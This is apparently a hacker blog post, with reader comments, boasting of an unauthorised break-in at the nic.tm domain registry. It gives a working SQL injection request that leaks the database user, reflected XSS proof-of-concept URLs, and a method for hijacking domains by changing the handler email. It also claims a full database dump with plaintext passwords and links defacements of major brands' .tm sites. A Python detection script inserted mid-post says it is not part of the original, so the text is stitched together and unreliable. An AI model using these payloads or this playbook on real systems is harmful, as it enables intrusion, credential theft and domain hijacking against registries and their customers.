Data leakage from nic.tm

In an independent project we decided to penetrate some important sites, and today we want to share a small part of what we have done. Today we proudly announce nic.tm here: it has a vulnerable application which is prone to a MySQL injection bug. It was a big lead for us to obtain all the sites' credentials. In the rest of this update we describe the vulnerability that affected the site.
If you glance at the picture below:


Nic.tm data leakage

It can be understood that the hidden parameters might not be checked; this was the hole we focused on:

POST /cgi-bin/mail_my_domains HTTP/1.1
Host: nic.tm
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29--+a&OrderBy=1

And we received:

..................
..................
..................
The database search found 0 ~'drs@localhost'~ domains
.................. .................. ..................

Oops, we saw the data leakage from Nic.tm's database: drs@localhost is the current user of the database. In terms of data gathering, we automated the attack and dumped the whole database. Another considerable note was the passwords: they had been saved in clear text, which is an unacceptable issue for the NIC of a country. All dumped data are accessible by this link. We also found some important domains among the dumped data (they are listed below); we were capable of hijacking them easily:

www.youtube.tm
www.gmail.tm
www.msdn.tm
www.intel.tm
www.officexp.tm
www.xbox.tm
www.windowsvista.tm
www.orkut.tm
www.google.tm (?)
www.yahoo.tm
www.cisco.tm

This was not the end of the story; we realized that the application suffers from reflected cross-site scripting too. The affected parameters were Addr and OrderBy. POCs:

/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1

They both work correctly on Firefox. At last I would show you the panel of Gmail.tm after authentication:

Gmail.tm hacked
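A defender-side check for the two issues described above, as an added example that is not part of the original post: it URL-decodes the Addr and OrderBy parameters of logged requests, flags the UNION SELECT and script-tag patterns, and picks the ~'...'~ marker out of a response. The log entries and response line are constructed from the requests quoted in the post; the pattern and function names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed log entries (method, request target, POST body): the first three
# carry the payloads quoted above, the last is an ordinary lookup.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/mail_my_domains",
     "Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast"
     "%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29--+a&OrderBy=1"),
    ("GET", "/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a"
            "&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E", ""),
    ("GET", "/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E"
            "%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1", ""),
    ("GET", "/cgi-bin/mail_my_domains?Addr=1029999&OrderBy=1", ""),
]
# Constructed response line in the shape the post shows.
SAMPLE_RESPONSE = "The database search found 0 ~'drs@localhost'~ domains"

# Quote/paren closing the literal then UNION [ALL] SELECT, or a "-- " comment.
SQLI = re.compile(r"['\")]\s*union\s+(?:all\s+)?select\b|--\s", re.I)
# Reflected script injection: script tag, inline event handler, javascript: URL.
XSS = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I)
# Output framed by ~'...'~ (0x7e, 0x27), the marker the injection wraps
# around the leaked value so it can be picked out of the HTML.
LEAK = re.compile(r"~'([^']*)'~")

def extract_params(method, target, body):
    """Form fields from the POST body, or the query string for GET."""
    raw = body if method == "POST" else target.partition("?")[2]
    return parse_qs(raw, keep_blank_values=True)

def scan_request(method, target, body):
    """Sorted (parameter, finding) pairs; empty when the request looks clean."""
    findings = set()
    for name, values in extract_params(method, target, body).items():
        for value in values:
            value = unquote_plus(value)  # also catches double-encoded payloads
            if SQLI.search(value):
                findings.add((name, "sqli"))
            if XSS.search(value):
                findings.add((name, "xss"))
    return sorted(findings)

def leaked_values(response_text):
    """Values that a ~'...'~ marker frames in a response body."""
    return LEAK.findall(response_text)

if __name__ == "__main__":
    for method, target, body in SAMPLE_REQUESTS:
        print(method, scan_request(method, target, body))
    print("leaked:", leaked_values(SAMPLE_RESPONSE))
```

The response-side check is the one that catches an exfiltration already in progress: a tilde-quoted value in a page that should only ever print a domain count is a leak regardless of how the request was encoded.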

We can also point to another security imperfection: in the panel, if you want to change the DNS of a domain, a confirmation e-mail is sent to the handler's e-mail address, which can be changed to the attacker's mail address. The following domains were defaced for POC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
Have a nice hacking, be safe.


16 Comments.

  1. dangeroushacker

    lol, i am sorry for nic.tm
    tnx for sharing.

  2. Awesome and simple hack! Thanks for sharing!!

  3. Yet,another NIC data leakage (NIC.LK) | Are you secure enough? - pingback on January 28, 2013 at 1:18 am
  4. Yashar, well done.

    I had a question.

    There is someone who keeps hacking Joomla sites, going by the name
    gh()st
    and this is his site, bro: sec-w.com

    This is my e-mail; can you tell me what I should do about this Arab …?
    alavinik.nao@gmail.com

    • Yashar Shahinzadeh

      He most likely has a bug in one of the Joomla components.
      If you got hacked, write down the list of your extensions for me.
